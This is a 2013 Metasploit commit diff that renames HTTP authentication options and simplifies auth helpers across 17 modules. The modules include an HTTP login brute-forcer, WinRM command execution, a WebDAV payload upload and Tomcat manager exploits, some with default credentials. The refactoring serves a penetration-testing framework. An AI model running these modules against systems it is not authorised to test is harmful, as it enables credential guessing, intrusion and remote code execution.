last of revert-merge snaffu

bug/bundler_fix
David Maloney 2013-02-19 23:16:46 -06:00
parent 6abbbeb3ca
commit 0ae489b37b
17 changed files with 52 additions and 239 deletions

View File

@ -38,10 +38,10 @@ class Metasploit4 < Msf::Auxiliary
)) ))
# disabling all the unnecessary options that someone might set to break our query # disabling all the unnecessary options that someone might set to break our query
deregister_options('RPORT','RHOST', 'BasicAuthPass', 'BasicAuthUser', 'DOMAIN', deregister_options('RPORT','RHOST', 'DOMAIN',
'DigestAuthIIS', 'SSLVersion', 'NTLM::SendLM', 'NTLM::SendNTLM', 'DigestAuthIIS', 'SSLVersion', 'NTLM::SendLM', 'NTLM::SendNTLM',
'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', 'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session',
'NTLM::UseNTLMv2', 'DigestAuthPassword', 'DigestAuthUser', 'SSL') 'NTLM::UseNTLMv2','SSL')
register_options( register_options(
[ [

View File

@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'Cisco Device HTTP Device Manager Access', 'Name' => 'Cisco Device HTTP Device Manager Access',
'Description' => %q{ 'Description' => %q{
This module gathers data from a Cisco device (router or switch) with the device manager This module gathers data from a Cisco device (router or switch) with the device manager
web interface exposed. The BasicAuthUser and BasicAuthPass options can be used to specify web interface exposed. The USERNAME and PASSWORD options can be used to specify
authentication. authentication.
}, },
'Author' => [ 'hdm' ], 'Author' => [ 'hdm' ],
@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
print_good("#{rhost}:#{rport} Successfully authenticated to this device") print_good("#{rhost}:#{rport} Successfully authenticated to this device")
# Report a vulnerability only if no password was specified # Report a vulnerability only if no password was specified
if datastore['BasicAuthPass'].to_s.length == 0 if datastore['PASSWORD'].to_s.length == 0
report_vuln( report_vuln(
{ {

View File

@ -48,9 +48,8 @@ class Metasploit3 < Msf::Auxiliary
register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ]) register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])
end end
def find_auth_uri_and_scheme def find_auth_uri
path_and_scheme = []
if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0 if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0
paths = [datastore['AUTH_URI']] paths = [datastore['AUTH_URI']]
else else
@ -80,21 +79,10 @@ class Metasploit3 < Msf::Auxiliary
next if not res next if not res
end end
next if not res.code == 401 return path
next if not res.headers['WWW-Authenticate']
path_and_scheme << path
case res.headers['WWW-Authenticate']
when /Basic/i
path_and_scheme << "Basic"
when /NTLM/i
path_and_scheme << "NTLM"
when /Digest/i
path_and_scheme << "Digest"
end
return path_and_scheme
end end
return path_and_scheme return path
end end
def target_url def target_url
@ -111,7 +99,7 @@ class Metasploit3 < Msf::Auxiliary
print_error("You need need to set AUTH_URI when using PUT Method !") print_error("You need need to set AUTH_URI when using PUT Method !")
return return
end end
@uri, @scheme = find_auth_uri_and_scheme() @uri = find_auth_uri
if ! @uri if ! @uri
print_error("#{target_url} No URI found that asks for HTTP authentication") print_error("#{target_url} No URI found that asks for HTTP authentication")
return return
@ -119,12 +107,7 @@ class Metasploit3 < Msf::Auxiliary
@uri = "/#{@uri}" if @uri[0,1] != "/" @uri = "/#{@uri}" if @uri[0,1] != "/"
if ! @scheme print_status("Attempting to login to #{target_url}")
print_error("#{target_url} Incompatible authentication scheme")
return
end
print_status("Attempting to login to #{target_url} with #{@scheme} authentication")
each_user_pass { |user, pass| each_user_pass { |user, pass|
do_login(user, pass) do_login(user, pass)
@ -133,27 +116,21 @@ class Metasploit3 < Msf::Auxiliary
def do_login(user='admin', pass='admin') def do_login(user='admin', pass='admin')
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'") vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
success = false
proof = ""
ret = do_http_login(user,pass,@scheme) response = do_http_login(user,pass)
return :abort if ret == :abort result = determine_result(response)
if ret == :success
proof = @proof.dup
success = true
end
if success if result == :success
print_good("#{target_url} - Successful login '#{user}' : '#{pass}'") print_good("#{target_url} - Successful login '#{user}' : '#{pass}'")
any_user = false any_user = false
any_pass = false any_pass = false
vprint_status("#{target_url} - Trying random username with password:'#{pass}'") vprint_status("#{target_url} - Trying random username with password:'#{pass}'")
any_user = do_http_login(Rex::Text.rand_text_alpha(8), pass, @scheme) any_user = determine_result(do_http_login(Rex::Text.rand_text_alpha(8), pass))
vprint_status("#{target_url} - Trying username:'#{user}' with random password") vprint_status("#{target_url} - Trying username:'#{user}' with random password")
any_pass = do_http_login(user, Rex::Text.rand_text_alpha(8), @scheme) any_pass = determine_result(do_http_login(user, Rex::Text.rand_text_alpha(8)))
if any_user == :success if any_user == :success
user = "anyuser" user = "anyuser"
@ -175,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary
:sname => (ssl ? 'https' : 'http'), :sname => (ssl ? 'https' : 'http'),
:user => user, :user => user,
:pass => pass, :pass => pass,
:proof => "WEBAPP=\"Generic\", PROOF=#{proof}", :proof => "WEBAPP=\"Generic\", PROOF=#{response.to_s}",
:source_type => "user_supplied", :source_type => "user_supplied",
:active => true :active => true
) )
@ -188,142 +165,25 @@ class Metasploit3 < Msf::Auxiliary
end end
end end
def do_http_login(user,pass,scheme) def do_http_login(user,pass)
case scheme
when /NTLM/i
do_http_auth_ntlm(user,pass)
when /Digest/i
do_http_auth_digest(user,pass,datastore['REQUESTTYPE'])
when /Basic/i
do_http_auth_basic(user,pass)
else
vprint_error("#{target_url}: Unknown authentication scheme")
return :abort
end
end
def do_http_auth_ntlm(user,pass)
begin begin
resp,c = send_http_auth_ntlm( response = send_request_cgi({
'uri' => @uri, 'uri' => @uri,
'method' => datastore['REQUESTTYPE'],
'username' => user, 'username' => user,
'password' => pass 'password' => pass
) })
c.close return response
return :abort if (resp.code == 404)
if [200, 301, 302].include?(resp.code)
@proof = resp
return :success
end
rescue ::Rex::ConnectionError rescue ::Rex::ConnectionError
vprint_error("#{target_url} - Failed to connect to the web server") vprint_error("#{target_url} - Failed to connect to the web server")
return :abort return nil
end end
return :fail
end end
def do_http_auth_basic(user,pass) def determine_result(response)
user_pass = Rex::Text.encode_base64(user + ":" + pass) return :abort unless response.kind_of? Rex::Proto::Http::Response
return :abort unless response.code
begin return :success if [200, 301, 302].include?(response.code)
res = send_request_cgi({
'uri' => @uri,
'method' => 'GET',
'headers' =>
{
'Authorization' => "Basic #{user_pass}",
}
}, 25)
unless (res.kind_of? Rex::Proto::Http::Response)
vprint_error("#{target_url} not responding")
return :abort
end
return :abort if (res.code == 404)
if [200, 301, 302].include?(res.code)
@proof = res
return :success
end
rescue ::Rex::ConnectionError
vprint_error("#{target_url} - Failed to connect to the web server")
return :abort
end
return :fail
end
def do_http_auth_digest(user,pass,requesttype)
path = datastore['AUTH_URI'] || "/"
begin
if requesttype == "PUT"
res,c = send_digest_request_cgi({
'uri' => path,
'method' => requesttype,
'data' => 'Test123\r\n',
#'DigestAuthIIS' => false,
'DigestAuthUser' => user,
'DigestAuthPassword' => pass
}, 25)
elsif requesttype == "PROPFIND"
res,c = send_digest_request_cgi({
'uri' => path,
'method' => requesttype,
'data' => '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>',
#'DigestAuthIIS' => false,
'DigestAuthUser' => user,
'DigestAuthPassword' => pass,
'headers' => { 'Depth' => '0'}
}, 25)
else
res,c = send_digest_request_cgi({
'uri' => path,
'method' => requesttype,
#'DigestAuthIIS' => false,
'DigestAuthUser' => user,
'DigestAuthPassword' => pass
}, 25)
end
unless (res.kind_of? Rex::Proto::Http::Response)
vprint_error("#{target_url} not responding")
return :abort
end
return :abort if (res.code == 404)
if ( [200, 301, 302].include?(res.code) ) or (res.code == 201)
if ((res.code == 201) and (requesttype == "PUT"))
print_good("Trying to delete #{path}")
del_res,c = send_digest_request_cgi({
'uri' => path,
'method' => 'DELETE',
'DigestAuthUser' => user,
'DigestAuthPassword' => pass
}, 25)
if not (del_res.code == 204)
print_error("#{path} could be created, but not deleted again. This may have been noisy ...")
end
end
@proof = res
return :success
end
if (res.code == 207) and (requesttype == "PROPFIND")
@proof = res
return :success
end
rescue ::Rex::ConnectionError
vprint_error("#{target_url} - Failed to connect to the web server")
return :abort
end
return :fail return :fail
end end

View File

@ -101,16 +101,13 @@ class Metasploit3 < Msf::Auxiliary
vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' with password:'#{pass}'") vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' with password:'#{pass}'")
success = false success = false
srvhdr = '?' srvhdr = '?'
user_pass = Rex::Text.encode_base64(user + ":" + pass)
uri = normalize_uri(datastore['URI']) uri = normalize_uri(datastore['URI'])
begin begin
res = send_request_cgi({ res = send_request_cgi({
'uri' => uri, 'uri' => uri,
'method' => 'GET', 'method' => 'GET',
'headers' => 'username' => user,
{ 'password' => pass
'Authorization' => "Basic #{user_pass}",
}
}, 25) }, 25)
unless (res.kind_of? Rex::Proto::Http::Response) unless (res.kind_of? Rex::Proto::Http::Response)
vprint_error("http://#{rhost}:#{rport}#{uri} not responding") vprint_error("http://#{rhost}:#{rport}#{uri} not responding")

View File

@ -40,10 +40,6 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip) def run_host(ip)
unless accepts_ntlm_auth
print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth"
return
end
streams = winrm_run_cmd(datastore['CMD']) streams = winrm_run_cmd(datastore['CMD'])
return unless streams.class == Hash return unless streams.class == Hash
print_error streams['stderr'] unless streams['stderr'] == '' print_error streams['stderr'] unless streams['stderr'] == ''

View File

@ -39,12 +39,8 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip) def run_host(ip)
unless accepts_ntlm_auth
print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth"
return
end
each_user_pass do |user, pass| each_user_pass do |user, pass|
resp,c = send_request_ntlm(test_request) resp = send_winrm_request(test_request)
if resp.nil? if resp.nil?
print_error "#{ip}:#{rport}: Got no reply from the server, connection may have timed out" print_error "#{ip}:#{rport}: Got no reply from the server, connection may have timed out"
return return

View File

@ -42,12 +42,7 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip) def run_host(ip)
unless accepts_ntlm_auth resp = send_winrm_request(winrm_wql_msg(datastore['WQL']))
print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth"
return
end
resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL']))
if resp.nil? if resp.nil?
print_error "Got no reply from the server" print_error "Got no reply from the server"
return return

View File

@ -84,8 +84,7 @@ class Metasploit3 < Msf::Auxiliary
'IPC$,ADMIN$,C$,D$,CCMLOGS$,ccmsetup$,share,netlogon,sysvol']) 'IPC$,ADMIN$,C$,D$,CCMLOGS$,ccmsetup$,share,netlogon,sysvol'])
], self.class) ], self.class)
deregister_options('BasicAuthPass', 'BasicAuthUser', 'DOMAIN', 'DigestAuthPassword', deregister_options('DOMAIN', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey',
'DigestAuthUser', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey',
'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2') 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2')
end end

View File

@ -72,8 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote
register_options( register_options(
[ [
OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'piranha']), OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'piranha']),
OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'q']), OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'q'])
], self.class) ], self.class)
end end
@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
if res.code == 401 if res.code == 401
print_error("401 Authorization Required! Our BasicAuthUser and BasicAuthPass credentials not accepted!") print_error("401 Authorization Required! Our Credentials not accepted!")
elsif (res.code == 200 and res.body =~ /The passwords you supplied match/) elsif (res.code == 200 and res.body =~ /The passwords you supplied match/)
print_status("Command successfully executed (according to the server).") print_status("Command successfully executed (according to the server).")
end end

View File

@ -227,9 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote
authmsg = res.headers['WWW-Authenticate'] authmsg = res.headers['WWW-Authenticate']
end end
print_error("The remote server responded expecting authentication") print_error("The remote server responded expecting authentication")
if datastore['BasicAuthUser'] and datastore['BasicAuthPass'] if authmsg
print_error("BasicAuthUser \"%s\" failed to authenticate" % datastore['BasicAuthUser'])
elsif authmsg
print_error("WWW-Authenticate: %s" % authmsg) print_error("WWW-Authenticate: %s" % authmsg)
end end
cleanup_instructions(rpath, name) # display cleanup info cleanup_instructions(rpath, name) # display cleanup info

View File

@ -96,9 +96,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
datastore['BasicAuthUser'] = datastore['USERNAME']
datastore['BasicAuthPass'] = datastore['PASSWORD']
jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8)) jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8)) app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))

View File

@ -123,9 +123,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
datastore['BasicAuthUser'] = datastore['USERNAME']
datastore['BasicAuthPass'] = datastore['PASSWORD']
jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8)) jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8)) app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))

View File

@ -112,9 +112,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
datastore['BasicAuthUser'] = datastore['USERNAME']
datastore['BasicAuthPass'] = datastore['PASSWORD']
res = query_serverinfo res = query_serverinfo
disconnect disconnect
return CheckCode::Unknown if res.nil? return CheckCode::Unknown if res.nil?
@ -127,8 +124,8 @@ class Metasploit3 < Msf::Exploit::Remote
:host => rhost, :host => rhost,
:port => rport, :port => rport,
:sname => (ssl ? "https" : "http"), :sname => (ssl ? "https" : "http"),
:user => datastore['BasicAuthUser'], :user => datastore['USERNAME'],
:pass => datastore['BasicAuthPass'], :pass => datastore['PASSWORD'],
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
:active => true :active => true
) )
@ -164,9 +161,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
datastore['BasicAuthUser'] = datastore['USERNAME']
datastore['BasicAuthPass'] = datastore['PASSWORD']
mytarget = target mytarget = target
if (target.name =~ /Automatic/) if (target.name =~ /Automatic/)
mytarget = auto_target mytarget = auto_target
@ -221,8 +215,8 @@ class Metasploit3 < Msf::Exploit::Remote
:host => rhost, :host => rhost,
:port => rport, :port => rport,
:sname => (ssl ? "https" : "http"), :sname => (ssl ? "https" : "http"),
:user => datastore['BasicAuthUser'], :user => datastore['USERNAME'],
:pass => datastore['BasicAuthPass'], :pass => datastore['PASSWORD'],
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
:active => true :active => true
) )

View File

@ -67,9 +67,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def go(command) def go(command)
datastore['BasicAuthUser'] = datastore['USERNAME']
datastore['BasicAuthPass'] = datastore['PASSWORD']
xml = <<-EOS xml = <<-EOS
<?xml version="1.0"?> <?xml version="1.0"?>
<methodCall> <methodCall>

View File

@ -72,8 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote
register_options( register_options(
[ [
Opt::RPORT(8080), Opt::RPORT(8080),
OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'anonymous']), OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'anonymous']),
OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']), OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com'])
], self.class) ], self.class)
end end

View File

@ -36,8 +36,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ [
OptString.new('PATH', [ true, "The path to attempt to upload", '/webdav/']), OptString.new('PATH', [ true, "The path to attempt to upload", '/webdav/']),
OptString.new('FILENAME', [ false , "The filename to give the payload. (Leave Blank for Random)"]), OptString.new('FILENAME', [ false , "The filename to give the payload. (Leave Blank for Random)"]),
OptString.new('RUSER', [ true, "The Username to use for Authentication", 'wampp']), OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', 'wampp']),
OptString.new('RPASS', [ true, "The Password to use for Authentication", 'xampp']) OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp'])
], self.class) ], self.class)
end end
@ -46,12 +46,12 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
uri = build_path uri = build_path
print_status "Uploading Payload to #{uri}" print_status "Uploading Payload to #{uri}"
res,c = send_digest_request_cgi({ res = send_request_cgi({
'uri' => uri, 'uri' => uri,
'method' => 'PUT', 'method' => 'PUT',
'data' => payload.raw, 'data' => payload.raw,
'DigestAuthUser' => datastore['RUSER'], 'username' => datastore['USERNAME'],
'DigestAuthPassword' => datastore['RPASS'] 'password' => datastore['PASSWORD']
}, 25) }, 25)
unless (res and res.code == 201) unless (res and res.code == 201)
print_error "Failed to upload file!" print_error "Failed to upload file!"

View File

@ -66,20 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
@compat_mode = false @compat_mode = false
end end
def check
unless accepts_ntlm_auth
print_error "The Remote WinRM server does not appear to allow Negotiate (NTLM) auth"
return Msf::Exploit::CheckCode::Safe
end
return Msf::Exploit::CheckCode::Vulnerable
end
def exploit def exploit
unless check == Msf::Exploit::CheckCode::Vulnerable
return
end
unless valid_login? unless valid_login?
print_error "Login Failure. Recheck your credentials" print_error "Login Failure. Recheck your credentials"
return return
@ -141,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
def temp_dir def temp_dir
print_status "Grabbing %TEMP%" print_status "Grabbing %TEMP%"
resp,c = send_request_ntlm(winrm_open_shell_msg) resp = send_winrm_request(winrm_open_shell_msg)
if resp.nil? if resp.nil?
print_error "Got no reply from the server" print_error "Got no reply from the server"
return nil return nil
@ -152,16 +139,16 @@ class Metasploit3 < Msf::Exploit::Remote
end end
shell_id = winrm_get_shell_id(resp) shell_id = winrm_get_shell_id(resp)
cmd = "echo %TEMP%" cmd = "echo %TEMP%"
resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id)) resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id))
cmd_id = winrm_get_cmd_id(resp) cmd_id = winrm_get_cmd_id(resp)
resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id)) resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id))
streams = winrm_get_cmd_streams(resp) streams = winrm_get_cmd_streams(resp)
return streams['stdout'].chomp return streams['stdout'].chomp
end end
def check_remote_arch def check_remote_arch
wql = %q{select AddressWidth from Win32_Processor where DeviceID="CPU0"} wql = %q{select AddressWidth from Win32_Processor where DeviceID="CPU0"}
resp,c = send_request_ntlm(winrm_wql_msg(wql)) resp = send_winrm_request(winrm_wql_msg(wql))
#Default to x86 if we can't be sure #Default to x86 if we can't be sure
return "x86" if resp.nil? or resp.code != 200 return "x86" if resp.nil? or resp.code != 200
resp_tbl = parse_wql_response(resp) resp_tbl = parse_wql_response(resp)
@ -247,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote
def valid_login? def valid_login?
data = winrm_wql_msg("Select Name,Status from Win32_Service") data = winrm_wql_msg("Select Name,Status from Win32_Service")
resp,c = send_request_ntlm(data) resp = send_winrm_request(data)
unless resp.code == 200 unless resp.code == 200
return false return false
end end